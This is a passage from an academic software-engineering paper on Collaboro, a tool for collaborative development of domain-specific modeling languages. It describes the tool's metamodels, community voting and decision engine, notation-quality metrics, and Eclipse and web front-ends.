aim, and if the change is deemed as important by the community, other members could propose a solution/s to adapt the language. As an example, Fig. 3 graphically depicts a possible collaboration scenario assuming a small community of one end-user and two developers. Each collaboration is represented as a bubble, and each step has been numbered. In the Figure, End-User 1 proposes a language change (step 1), which is accepted by the community (step 2), and then Developer 1 specifies a solution (step 3). The solution is rejected by End-User 1, including also the explanation of the rejection (step 4). As the rejection is accepted (step 5), the Developer 1 redefines the solution, which is eventually accepted (step 6) and the changes are then incorporated into the language. The resulting changes in the abstract and concrete syntaxes are shown in grey-filled boxes in Fig. 1. Clearly, it is important to make this collaboration iterations as quick as possible and with the participation of all the community members. Moreover, the discussion information itself must be preserved to justify the rationale behind each language evolution, from which design decisions can be derived. The recommender system may also participate in the collaboration and eventually improve the DSML. After checking the DSML definition, the recommender may detect that not all the attributes in the abstract syntax have a direct representation in the concrete syntax, as it happens with the arrival attribute of the Flight concept (as we will explain later, this is the result of applying the metric called Symbol Deficit). Thus, the system may create a new proposal informing about the situation and then the community could vote and eventually decide whether the DSML has to be modified. Our proposal for enabling the collaborative definition of DSMLs is built on top of the Collaboro DSML, a DSML for modeling the collaborations that arise in a community Figure 3 Example of collaboration in the Baggage Claim DSML. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 7/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ working towards the development of a DSML for that community. In the next sections, we will describe how Collaboro makes the collaboration feasible by: � Enabling the discussion about DSML elements, � providing the metaclasses for representing collaborations and giving support to the decision-making process, � providing a metric-based recommender that can help to develop high-quality DSMLs. Representing the elements of a DSML To be able to discuss about changes on the DSML to-be, we must be able to represent both its abstract syntax (i.e., the concepts of the DSML) and its concrete syntax (the notation to represent those concepts) elements. Additionally, to improve the understanding of how changes in its definition affect the DSML, we provide a mechanism to automatically render DSML examples using the concrete syntax notation under development. Abstract syntax The abstract syntax of a DSML is commonly defined by means of a metamodel written using a metamodeling language (e.g., Meta-Object Facility (MOF) (Object Management Group, 2015b) or Ecore (Steinberg et al., 2008)). Metamodeling languages normally offer a limited set of concepts to be used when creating DSML metamodels (like types, relationship or hierarchy). A DSML metamodel is then defined as an instantiation of this metamodeling concepts. Figure 4A shows an excerpt of the well-known Ecore metamodeling language, on which we rely to represent the abstract syntax of DSMLs. Concrete syntax Regarding the concrete syntax, since the notation of a DSML is also domain-specific, to promote the discussion, we need to be able to explicitly represent the notational elements proposed for the language. Thanks to this, community members will have the freedom to create a notation specially adapted to their domain, thus avoiding coupling with other existing notations (e.g., Java-based textual languages or UML-like diagrams). The type of notational elements to represent largely depends on the kind of concrete syntax envisioned (textual or graphical). Nowadays, there are some tool-specific metamodels to represent either graphical or textual concrete syntaxes (like the ones included in GMF (http://eclipse.org/gmf-tooling), Graphiti (https://eclipse.org/graphiti) and Xtext (http://eclipse.org/Xtext)), or to interchange model-level diagrams (Object Management Group, 2014b). However, a generic metamodel covering both graphical and textual syntaxes (and combinations of both) is not typically available in other tools. Therefore, we contribute in this paper our own metamodel for concrete syntaxes. Figure 4B shows an excerpt of the core elements of this notation metamodel. As can be seen, the metamodel is not exhaustive, but it is a lightweight solution that suffices to discuss about the concrete syntax elements most commonly used in the definition of graphical, textual or hybrid concrete syntaxes (offering a good trade-off Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 8/35 http://eclipse.org/gmf-tooling https://eclipse.org/graphiti http://eclipse.org/Xtext http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ between expressiveness and manageability of the description in order to render and analyze/recommend changes). Note that, with this metamodel, it is possible to describe how to represent each language concept, thus facilitating keeping track of language notation changes. Concrete syntax elements are classified following the NotationElement hierarchy, which includes graphical elements (GraphicalElement metaclass), textual elements (TextualElement metaclass), composite elements (Composite metaclass) and references to the concrete syntax of other abstract elements (SyntaxOf metaclass) to be used in composite patterns. The main graphical constructs are provided by the GraphicalElement hierarchy, which allows referring to external pictures (External metaclass), building figures (see Figure hierarchy), lines (Line metaclass) and labels for the DSML elements. A label (Label metaclass) serves as a container for a textual element. Textual elements can be defined with the TextualElement hierarchy, which includes tokens, keywords and values directly taken from the abstract syntax elements expressed in a textual form (Value metaclass). It is possible to obtain the textual representation from either an attribute (AttValue metaclass) by specifying the attribute to be queried (attribute reference), or a reference (RefValue metaclass) by specifying both the reference (reference reference) and the attribute of the referred element to be used (attribute reference). The attribute separator of the Value metaclass allows defining the separator for multivalued elements. The Composite element can be used to define complex concrete syntax structures, allowing both graphical and textual composites but also hybrids. Finally, the SyntaxOf metaclass allows referencing to already specified concrete syntax definitions of abstract syntax elements, thus allowing modularization and (b) (a) EStructuralFeature EAttribute EReference ETypedElement EClassifier EClass EDataType EEnum EEnumLiteral EPackage 0..1 0..* 0..* +eType EReference <<from ECore package>> NotationElement SyntaxOfComposite GraphicalElement x : int y : int height : int width : int LabelFigure Line Token Keyword 0..1 1..* subElems reference id : String TextualElement separator : String Value RefValueAttValue 1..1 EAttribute <<from ECore package>> attribute 1..1 EReference <<from ECore package>> reference 1..1 text 1..1 1..1 separator 0..* 0..1 0..* 0..* 0..* External path: String NotationDefinition 0..* elements OvalRectangle Polygon fill : Color stroke : Color 1..* Figure 4 Excerpts of the (A) Ecore and (B) notation metamodels used to represent, respectively, the abstract and concrete syntaxes of DSMLs in Collaboro. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 9/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ composition. The reference reference of the SyntaxOf metaclass specifies the reference to be queried to obtain the set of elements whereas the separator reference indicates the separator between elements. Renderer The current DSML notation specification plus the set of example models for the DSML (expressed as instances of the DSML abstract syntax) can be used to generate concrete visual examples that help community members get a better idea of the language being built. We refer to this generator as renderer. The renderer takes, as inputs: (1) the abstract and (2) concrete syntaxes of the DSML, and (3) the set of example models conforming to the abstract syntax; and returns a set of images representing the example models expressed according to the concrete syntax defined in the notation model (additional technical details about the render process will be given in the Section describing the developed tooling). We believe the advantages of this approach is twofold. On the one hand, it is a lightweight mechanism to quickly validate the DSML without generating the DSML tooling support. On the other hand, developers and end-users participating in the collaboration can easily assess how the language looks like without the burden of dealing with the abstract and concrete syntax of DSML, which are expressed as metamodels. Example Figure 1A shows an example of the abstract syntax for the Baggage Claim DSML while Fig. 5 shows the notation model for the textual representation of the metaclass Figure 5 (A) Textual representation example of the metaclass Conveyor of the Baggage Claim DSML and (B) the corresponding notation model. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 10/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Conveyor of such DSML (Fig. 5A shows a textual example and Fig. 5B shows the corresponding notation model). Note that AttValue and RefValue metaclass instances are referring to elements from the abstract syntax metamodel. Fig. 1B shows a possible renderization of a model for such language. Representing the collaborations The third metamodel required in our process focuses on representing the collaborations that annotate/modify the DSML elements described before. This collaboration metamodel, which is shown in Fig. 6, allows representing both static (e.g., change proposals) and dynamic (e.g., voting) aspects of the collaboration. Being the core of our collaborative approach, we refer to this metamodel as the Collaboro metamodel. Static aspects Similarly to how version control systems track source code, Collaboro also allows representing different versions of a DSML. The VersionHistory metaclass represents the set of versions (Version metaclass) through which the collaboration evolves. There is always a main version history set as trunk (type attribute in VersionHistory metaclass), which keeps the baseline of the collaborations about the language under development. Other version histories (similar to branches) can be forked when necessary to isolate the collaboration about concrete parts of the language. Different version histories can be merged into a new one (or the trunk). Figure 6 Core elements of the Collaboro metamodel. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 11/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Language evolution is the consequence of collaborations (Collaboration metaclass). Collaboro supports three types of collaborations: change proposals (Proposal metaclass), solutions proposals (Solution metaclass) and comments (Comment metaclass). A collaboration is proposed by a user (proposedBy reference) and includes an explanation (rationale attribute). A change proposal describes which language feature should be modified and contains some meta information (e.g., priority or tags). Change proposals are linked to the set of solutions proposed by the community to be discussed for agreement. It is also possible to specify possible conflicts between similar proposals (e.g., the acceptance of one proposal can involve rejecting others) with the conflictWith reference. Solution proposals are the answer to change proposals and describe how the language should be modified to incorporate the new features. Each solution definition involves a set of add/update/delete changes on the elements of the DSML (Change hierarchy). Change links the collaboration metamodel with the DSML under discussion (SyntaxElement metaclass), which can refer to the abstract syntax (AbstractSyn taxElement metaclass) or the concrete syntax (ConcreteSyntaxElement metaclass). The latter links (maps reference) to the abstract element to which the notation is defined. Both AbstractSyntaxElement and ConcreteSyntaxElement metaclasses have a reference linking to the element which is being changed (element reference). Changes in the abstract syntax are expressed in terms of the metamodeling language (i.e., EModelElement elements, which is the interface implemented by every element in the Ecore metamodel) while changes in the concrete syntax are expressed in terms of elements conforming to the notation metamodel presented before. The Change metaclass has a reference to the container element affected by the change (referredElement reference) and the element to change (target reference). Thereby, in the case of Add and Delete metaclasses, referredElement reference refers to the element to which we want to add/delete a “child” element whereas target refers to the actual element to be added/deleted. In the case of the Update metaclass, referredElement reference refers to the element which contains the element to be updated (e.g., a metaclass) whereas target reference refers to the new version of the element being updated (e.g., a new version for an attribute). The additional source attribute indicates the element to be updated (e.g., the attribute which is being updated). Dynamic aspects During the process, community members vote collaboration elements, thus allowing to reach agreements. Votes (Vote metaclass) indicate whether the user (votedBy reference) agrees or not with a collaboration (agreement attribute). A vote against a collaboration usually includes a comment explaining the reason of the disagreement (comment reference of Vote metaclass). This comment can then be voted itself and if it is accepted by the community, the proponent of the voted proposal/solution should take such comment into account (the included attribute of Comment metaclass records this fact). Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 12/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ The acceptance of a proposal means that the community agrees that the requested change is necessary (accepted attribute). For each proposal we can have several solutions but in the end one of them will be selected (selected reference of the Proposal metaclass) and its changes applied to the DSML definition. Part of this data (like the accepted and selected properties) is automatically filled by the decision engine analyzing and resolving the collaboration. Making decisions Community votes are used to decide which collaborations are accepted and must be incorporated into the language. Collaboration models include all the necessary information, thus allowing the automation of the decision process (i.e., approval of change proposals and selection of solutions). A decision engine can therefore apply resolution strategies (e.g., unanimous agreement, majority agreement, etc.) to deduce (and apply) the collaborations accepted by the community. As commented before, most times it is necessary to have the role of the community manager to trigger the decision process and solve possible decision locks. Example As example of collaboration, we show in Fig. 7 the collaboration model which would be obtained when using Collaboro to model the example discussed previously. The figure is divided in several parts according to the collaboration steps enumerated previously. For the sake of clarity, references to User metaclass instances have been represented as Figure 7 The collaboration model representing the collaborations arisen in the Baggage Claim DSML. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 13/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ string-based attributes and the rationale attribute is not shown. The figure shows the collaboration as an instance of the Collaboro metamodel. At the tool level, we offer a user-friendly interface enabling all kinds of users to easily contribute and vote during the discussion process while the tool updates the collaboration model behind the scenes in response to the user events. Part 1 of Fig. 7 shows the collaboration model just after End-User 1 makes the request. It includes a new Proposal instance that is voted positively by the rest of the users and therefore accepted (see part 2). Then, a new solution is proposed by Developer 1 (see part 3), which involves enriching the Conveyor metaclass with a float attribute in addition to define the concrete syntax. However, this solution is not accepted by all the community members: End-User 1 does not agree and explains his disagreement (see part 4). Since the comment is accepted (see part 5), Developer 1 updates the solution to incorporate the community recommendations (see part 6). Note that the elements describing the model changes in parts 3 and 6 are mutually exclusive. Moreover, the included attribute of the Comment element in part 4 will be activated as a consequence of the solution update. Once everybody agrees on the improved solution, it is selected as the final one for the proposal (see the selected reference). Now the development team can modify the DSML tooling knowing that the community needs such change and agrees on how it must be done. Moreover, the rationale of the change will be tracked by the collaboration model (from which an explanation in natural language could be generated, if needed), which will allow community members to know why the Conveyor metaclass was changed. Metric-based recommender When developing DSMLs, several quality issues regarding the abstract and concrete syntaxes can be overlooked during the collaboration. While developers are maybe the main responsibles for checking that the language is being developed properly, it is important to note that these issues may arise from both developers (e.g., they can forget defining how some concepts are represented in the notation) and end-users (e.g., they may miss that the notation is becoming too complicated for them to later being able to manage complex models). We propose to help both developers and end-users to develop better DSMLs by means of a recommender engine which checks the language under development to spot possible issues and improvements. The recommender applies a set of metrics on the DSML to check its quality, in particular, to ensure that the resulting language is expressive, effective and accurate enough to be well-understood by the end-users. Metrics can target both the abstract and concrete syntaxes of a DSML. Concrete syntax metrics can in turn target either textual or graphical syntaxes. While several metrics for abstract and textual concrete syntaxes have been devised in previous works (Cho & Gray, 2011; Aguilera, Gómez & Olivé, 2012; Power & Malloy, 2004; Črepinšek et al., 2010), the definition and implementation of metrics for graphical concrete syntaxes is still an emerging working area. Thus, in this work, we explore how metrics for abstract and concrete Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 14/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ syntaxes can be implemented in our approach, but we mainly focus on those ones regarding graphical concrete syntaxes. Abstract syntax metrics The abstract syntax of a DSML is defined by a metamodel, as commented before. While the identification of proper DSML constructs (i.e., concepts and relationships) usually relies on the domain experts, identifying and solving design issues (e.g., creating hierarchies to promote extensibility or identifying patterns such as factoring attributes) is normally performed by the developers. Thus, to provide consistent solutions for recurring metamodel design issues, some metrics applied to abstract syntax metamodels may offer key insights on its quality. There are currently several works providing a set of metrics for metamodels as well as for UML class diagrams that can be applied in this context (e.g., Cho & Gray, 2011; Aguilera, Gómez & Olivé, 2012). As a proof of concept to evaluate the abstract syntax of DSMLs in our approach, we implemented a couple of metrics that validate hierarchical structures in metamodels (inspired by Aguilera, Gómez & Olivé (2012)). Thus, we consider that such structures are invalid whether either there is only one derived class or whether an inheritage is redundant (i.e., already covered by a chain of inheritage). As our approach relies on Ecore, other metrics defined for this metamodeling language could be easily plugged in by using the extension mechanism provided, as we will show afterwards. Concrete syntax metrics The concrete syntax of a DSML can be textual or graphical (or hybrid). As textual DSMLs are usually defined by means of a grammar-based approach, which is also the case for GPLs, existing support for evaluating the quality of GPLs could be applied (e.g., Power & Malloy (2004) and Črepinšek et al. (2010)). Apart from this GPL-related support, the current support to assess the quality of the concrete syntaxes in the DSML field is pretty limited. Thus, in this paper, we apply a unifying approach to check the quality of any DSML concrete syntax (i.e., textual and/or graphical). With this purpose, we employ the set of metrics based on the cognitive dimensions framework (Green, 1989), later formalized by Moody (2009), where metrics are presented according to nine principles, namely: cognitive integration, cognitive fit, manageable complexity, perceptual discriminality, semiotic clarity, dual coding, graphic economy, visual expressiveness and semantic transparency. Several works have applied them to specific DSMLs (e.g., Genon, Heymans & Amyot (2011b) or Le Pallec & Dupuy-Chessa (2013)). Nevertheless, none of them has tried to implement such metrics in a way that can be applied generically to any DSML. As Collaboro provides the required infrastructure to represent concrete syntax at a technology-agnostic level, we propose to define a set of DSML metrics adapted from Moody’s principles for designing cognitively effective notations. In the following, we present how we addressed five of the nine principles to be applied to our metamodels, and we justify why the rest of the principles were discarded. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 15/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Semiotic clarity. This principle refers to the need of having a one-to-one correspondence between notation symbols and their corresponding concepts, thus maximizing precision and promoting expressiveness. We can identify four metrics according to the possible situations that could appear: (1) symbol deficit, when a concept is not represented by a notation symbol (sometimes this situation could be evaluated positively as to avoid having too many symbols and losing visual expressiveness); (2) symbol excess, when a notation symbol does not represent any concept; (3) symbol redundancy, when multiple notation symbols can be used to represent a single concept; and (4) symbol overload, when multiple concepts are represented by the same notation symbol. In Collaboro, these metrics can be computed by analyzing the mapping between the abstract syntax elements and the notation model elements of the DSML (i.e., analyzing the maps reference in the ConcreteSyntaxElement element). On the one hand, the analysis of the abstract syntax consists on a kind of flattening process where all the concepts are enriched to include the attributes and references inherited from their ancestors. The aim is to identify the DSMLs elements (i.e., concept, attribute or reference) for which a concrete syntax element has to be defined. On the other hand, the analysis of the concrete syntax focuses on the discovery of symbols. When a symbol uses multiples graphical elements to be represented (e.g., using nested Composite elements or SyntaxOf elements), they are aggregated. The result of this analysis is stored in a map that links every abstract syntax element with the corresponding concrete syntax element, thus facilitating the calculation of the previous metrics. This map will be also used in the computation of the remainder metrics. Visual Expressiveness. This principle refers to the number of visual variables used in the notation of a DSML. Visual variables define the dimensions that can be used to create notation symbols (e.g., shape, size, color, etc.). Thus, to promote its visual expressivenes, a language should use the full range and capacities of visual variables. To assess this principle, we define a metric which analyzes how visual variables are used in a DSML. The metric leverages on the previous map data structure and enriches it to include the main visual variables used in each symbol. According to the current support for visual variables of the notation metamodel (recall GraphicalElement metaclass attributes), these variables include: size (height and width attributes), color (fill and stroke attributes) and shape (subclasses of GraphicalElement metaclass). The metric checks the range of visual variables used in the symbols of the DSML and notifies the community when the notation should use more visual variables and/or more values of a specific visual variable to cover the full range. Graphic Economy. This principle states that the number of notation symbols should be cognitively manageable. Note that there is not an objective rule to measure the complexity of notation elements (e.g., expert users may cognitively manage more symbols than a novice). There is the six symbol rule (Miller, 1956) which states that there should be no more than six notation symbols if only a single visual variable is used. We therefore devised a metric based on this rule to assess the level of graphic economy in a DSML. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 16/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Perceptual Discriminality. This principle states that different symbols should be clearly distinguishable from each other. Discriminality is primarily determined by the visual distance between symbols, that is, the number of visual variables on which they differ and the size of these differences. This principle also states that every symbol should have at least one unique value for each visual variable used (e.g., unique colors for each symbol). Thus, to assess the perceptual discriminality, we define a metric which also relies on the previous map data structure, compares each pair of symbols and calculates the visual distance between them according to the supported visual variables (i.e., number of different visual variables per pair of symbols). By default, the metric notifies the community when the average distance is lower than one, but it can be parameterized. Dual Coding. This principle suggests that using text and graphics together conveys the information in a more effective way. Textual encoding should be then used in addition of graphical encoding to improve understanding. However, textual encoding should not be the only way to distinguish between symbols. We defined a metric that checks whether each symbol uses text and graphics elements, thus promoting dual coding. To this aim, we leverage on our notation metamodel, which allows to attach textual elements to symbols by employing Label elements that contain TextualElement elements. This metric notifies the community when more than a half of the symbols are not using both text and graphics. The remaining four Moody’s principles were not addressed due to the reasons described below. Semiotic Transparency. This principle states that a notation symbol should suggest its meaning. This principle is difficult to evaluate as it relies on many parameters such as context and good practices in the specificdomain. Furthermore, as the meaning of a representation is subjective, an automatic verification of this principle would be difficult to reach. Complexity Management. This principle refers to the ability of the notation to represent information without overloading the human mind (e.g., providing hierarchical notations). Although this could be addressed in the notation model by providing mechanisms for modularization and hierarchical structuring, we believe that assessing this principle strongly depends on the profile and background of the DSML end-users and it is therefore hard to measure. Cognitive Integration. This principle states that the visual notation should include explicit mechanisms to support integration of information from different diagrams. In this sense, this principle refers to the results of composing different DSMLs, which is not an scenario targeted by our approach. Cognitive Fit. This principle promotes the fact that different representations of information are suitable for different tasks and audiences (e.g., providing different concrete syntaxes for the same abstract syntax). Like in the complexity management principle, assessing the cognitive fit of the notations of a DSML is directly related to the expertise of the different communities using the language, which is hard to measure with an automatic evaluation. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 17/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Recommending changes The results of the previously shown metrics provide the community developing a DSML with an important feedback to address potential improvements. In Collaboro, the DSML development process incorporates a recommender that plays the role of a user in the collaborationprocess.This“recommenderuser”can checkthedifferentversionsoftheDSML under development according to the previously shown metrics and propose new changes identifying the weak points to be discussed in the community. Metrics can be deactivated if wished and can be given different relevance values that can also be used to sum up theresults to calculate a general value assessing the quality of the DSML under development. Example In this section, we will show an example of the metrics regarding visual expressiveness and perceptual discriminatity for the Baggage Claim DSML. For the sake of illustration purposes, we describe these metrics on an alternative graphical syntax to the DSML, where the Flight concept is represented as a poligon with the shape of an airplane, the Conveyor concept is represented as a black filled-rectangle and the claims reference is represented as a line. The computation of these metrics are specially tailored to the visual variables supported by our notation metamodel. Table 1 illustrates how these two metrics are calculated. As can be seen, visual expressiveness results assess the number of different values used for each visual variable. Thus, there are three out of five values for the shape dimension, two different values for the size dimension and two different values for the color dimension. On the other hand, the visual distance is calculated for each pair of symbols and measures the number of different visual variables between them. For instance, the black-filled rectangle differs in two visual variables (i.e., color and shape) with the airplane polygon; and all the supported visual variables with regard to the line. These results reveal a good visual expressiveness (good values for shape and size visual variables while the color range is appropriate for the number of symbols) and perceptual discriminality (visual distance is in average more than 2, where the highest value is 3) therefore validating this graphical notation proposal. Table 1 Example of Visual Expressiveness and Perceptual Discriminality for the Baggage Claim DSML. VE Shape Polygon Rectangle Line 3/5 Size H:5 H:5 H:1 2 W:9 W:9 W:12 Color Fill:White Fill:Black Fill:White 2/49 Stroke:Black Stroke:Black Stroke:Black PD Visual Distance Visual Distance Visual Distance B:2 A:2 A:2 C:2 C:3 B:3 Note: VE, Visual Expressiveness; PD, Perceptual Discriminability. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 18/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ COLLABORATIVE MODELING In this section we will show how our approach could be easily adapted to support collaborative modeling. This adaptation is depicted in Fig. 8. Unlike the Fig. 2, where we illustrated the process for the collaborative development of DSMLs, in this case the community evaluates and discuss changes about the model being developed and not the metamodel. Thus, once there is a first version of the model and a set of examples (step 1), the community discusses how to improve the models (step 2). The discussion arises changes and improvements, that have to be voted and eventually incorporated in the model (step 3). Discussion and decisions are recorded (see Collaboration History), thus keeping track of the modifications performed in the model. To support this development process, the modifications to perform in the original Collaboro metamodel are very small. Figure 9 shows the new metamodel to track the collaboration. As can be seen, the only changed element is the SyntaxElement, which now has to refer to the main (i.e. root) metaclass of the modeling language being used to link the model elements with their metamodel definition. For instance, by default, the Figure includes the element NamedElement from UML, thus illustrating how Collaboro could be used for the collaborative development of UML models. Other languages could be supported following this same approach. TOOL SUPPORT Since the very first implementation of Collaboro was released, the tool support has evolved to integrate the full set of features described in this paper 2 . The new architecture of the developed tool is illustrated in Fig. 10. The main functionalities of our approach are implemented by the backend (see Collaboro Backend), which includes specific Collaborations End-users Developers Collaboration History evaluates<< << ch an ge s << << isStored<< << Decision Engine 2 3 Community Manager drives<< << updates<< << 1 Model Model Instances instanceOf<< << Figure 8 Collaborative modeling. 2 The tool is available at http://som- research.github.io/collaboro Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 19/35 http://som-research.github.io/collaboro http://som-research.github.io/collaboro http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ components for modeling both the DSML elements and the collaborations (see Modeling Support), rendering the notation examples (see Notation Renderer) making decisions (see Decision Engine), and recommending changes (see Recommender System). As front-end for Collaboro, we have developed two alternatives: (1) a web-based front-end, which gives access to the collaboration infrastructure from any web browser; and (2) an Eclipse-based front-end, which extends the platformwithviews and editors facilitating the collaboration. Next, we describe in detail each component of this architecture. Collaboro backend This component provides the basic functionality to develop collaborative DSMLs as explained in this paper. Collaboro relies on the EMF framework (Steinberg et al., 2008) (the standard de facto modeling framework nowadays) to manage the models required during the development process. In the following, we describe the main elements of this component. Proposal accepted : boolean Solution Comment included : boolean sols Version id : String proposals Collaboration id : String rationale : String User id : String proposedBy MetaInfo Priority value : int TagBased Tag value : String Change referredElement target Add Update Delete Vote agreement : boolean votedBy selected comment metaInfo 0..* 0..* 1..1 1..1 1..1 votes 0..* comments 0..* 0..1 1..1 changes0..* 1..1 1..1 0..* tags source 1..1 0..* 1..1 1..1 1..1 1..1 1..1 1..1 1..1 1..1 0..1 0..* 0..* 1..1 collaborations votes 1..1 VersionHistory type : HistoryType 0..1 0..1versions HistoryType TRUNK BRANCH previous 1..0 1..0 NamedElement <<from UML package>> 0..* conflictWith 0..* Figure 9 Core elements of the adapted Collaboro metamodel. Figure 10 Architecture of Collaboro tool support. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 20/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Modeling support Collaboro provides support for managing models representing the abstract and concrete syntaxes, and the collaboration models. We implemented the metamodels described in previous sections as Ecore models (the metamodeling language used in EMF) and provided the required API. To support concurrent collaboration the tool can be configured to store the models in a CDO (http://www.eclipse.org/cdo) model repository. Notation renderer The tool incorporates a generator which automatically creates the graphical/textual representation of the DSML example models. This component enables the lightweight creation of SVG (SVG, 2011) images from notation models to help users “see” how the notation they are discussing will look like when used to define models with that DSML. The generator analyzes each example model element, locates its abstract/concrete syntax elements and interprets the concrete syntax definition to render its textual/ graphical representation. GraphicalElement and TextualElement concrete syntax elements indicate the graphical or textual representation to be applied (e.g., a figure or a text field), while Composite and SyntaxOf concrete syntax elements are used for layout and composite elements. Regarding the layout of the generated graphical/textual representation, on the one hand, a block-based notation is automatically applied for textual languages, where each new Composite concrete syntax element (and its contained elements) is indented. On the other hand, graphical notations are rendered following a horizontal layout, thus elements are arranged from left to right as the example model is analyzed. Note that symbols acting as connectors between concepts are detected by means of the maps reference in ConcreteSyntaxElement, thus allowing the renderer to know what concepts (and their corresponding symbols) are used as source/target elements. Decision engine This component is responsible for updating the dynamic part of the collaboration models (recall the support for votes and decisions). The current support of the tool implements a total agreement strategy to infer community agreements from the voting information of the collaboration models. Recommender system This component provides the required infrastructure to calculate both abstract and concrete syntaxes metrics in order to ensure their quality. The recommender is executed on demand by the community manager. The current support of the tool implements metrics to evaluate the quality of concrete graphical syntax issues. New metrics can be plugged in by extending the Java elements presented in Fig. 11. The entry point is the Metric Factory class, which is created for each DSML and is responsible for providing the list of available metrics. Metrics have a name, a description, a dimension (e.g., each Moody’s principle), an activation, a priority level and an acceptance ratio. The acceptance ratio allows specifying the maximum number of elements of syntaxes that can be wrong (e.g., not conforming to the Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 21/35 http://www.eclipse.org/cdo http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ metric). Every metric also includes an execute() method for the recommender to compute them. This function returns a list of MetricResults describing the assessment of the metric. Metric results includes a status (i.e., measured in three levels), a reason describing the assessment in natural language and a ratio of fulfillment for the metric. Metric results also include a list of ReferredElements pointing to those abstract or concrete syntaxes elements not conforming with the metrics being calculated, thus helping developers to spot the DSML elements not satisfying each metric (if any). Eclipse plugin We have developed an Eclipse plugin implementing the Collaboro process and DSML. The plugin provides a set of new Eclipse views and editors to facilitate the collaboration, which can be considered a kind of concrete syntax of Collaboro itself for non-expert users. Via these editors users can propose changes (to add both new abstract syntax and concrete syntax definitions to existing abstract elements) on the Collaboro model that, once accepted, will update the abstract and concrete syntax models and link them together according to the selected solution. Figure 12A includes a snapshot of the environment showing the last step of the collaboration described in previous sections. In particular, the Version view lists the collaboration elements (i.e., proposals, solutions and comments) of the current version of the collaboration model. The Collaboration View shows the detailed information of the selected collaboration element in the Version view and a tree-based editor to indicate the changes to discuss for that element, as shown in Fig. 12A. Finally, the Notation view uses the notation AbstractSyntaxMetric ConcreteSyntaxMetric ConcreteSyntaxGraphicalMetric ConcreteSyntaxTextualMetric MetricResult status : MetricResultStatus reason : String ratio : Float ReferredElement name : String reason : ReferredElementReason AbstractReferredElement AbstractSyntaxElement : EObject ConcreteReferredElement ConcreteSyntaxElement : NotationElement 0..* 1..11..1 0..* 0..* 1..1 Metric name : String dimension : String execute() : List<MetricResult> description : String acceptanceRatio : Integer isActive : Boolean priority : MetricPriority MetricFactory abstractSyntax : EPackage concreteSyntax : Definition getAbstractSyntaxMetrics() getConcreteSyntaxMetrics() MetricPriority HIGH NORMAL LOW «Enumeration» ReferredElementReason MISSING WRONG «Enumeration» MetricResultStatus GOOD MIDDLE BAD «Enumeration» Figure 11 Core elements of the recommender engine. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 22/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ generator to render a full example model of the language. For instance, the Notation view in Figs. 12B and 12C show the notation (i.e., in textual and graphical forms, respectively) for an example model, which allowed detecting the missing attribute regarding the conveyor capacity. Web-based front-end The developed web support includes two components: (1) the server-side part, which offers a set of services to access to the main functionalities of Collaboro; and the (a) (b) (c) Figure 12 (A) Snapshot of the Collaboro Eclipse plugin. Collaboro Eclipse plugin with the Notation view rendering the (B) textual and (C) graphical concrete syntaxes for a model. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 23/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ client-side part, which allows both end-users and developers to take part of the DSML development process from their browsers. The server-side component has been developed as a Java web application which uses a set of Servlets providing the required services. On the other hand, the client-side component has been developed as an AngularJS-enabled website. Figures 13 and 14 show two snapshots of the developed website. As can be seen in Fig. 13, the website follows an arrangement similar to that one used in the Eclipse plugin. Thus, on top, there are two sections showing the current status of (1) the abstract syntax of the DSML on the left and (2) several model examples rendered with the concrete syntax definition of the DSML on the right (both sections are zoom- enabled). These sections include several pictures that can be navigated by the user (e.g., it is possible to evaluate the different example models rendered). At the bottom of the website, there are two more sections aimed at managing the collaborations, in particular, (1) a tree including all the collaboration elements on the left and (2) a details view on the right which shows the information of a collaboration once it is selected in the tree. Furthermore, the tree view also includes buttons to create, edit and delete collaborations. Figure 13 Snapshot of the Collaboro web client. Cánovas Izquierdo and 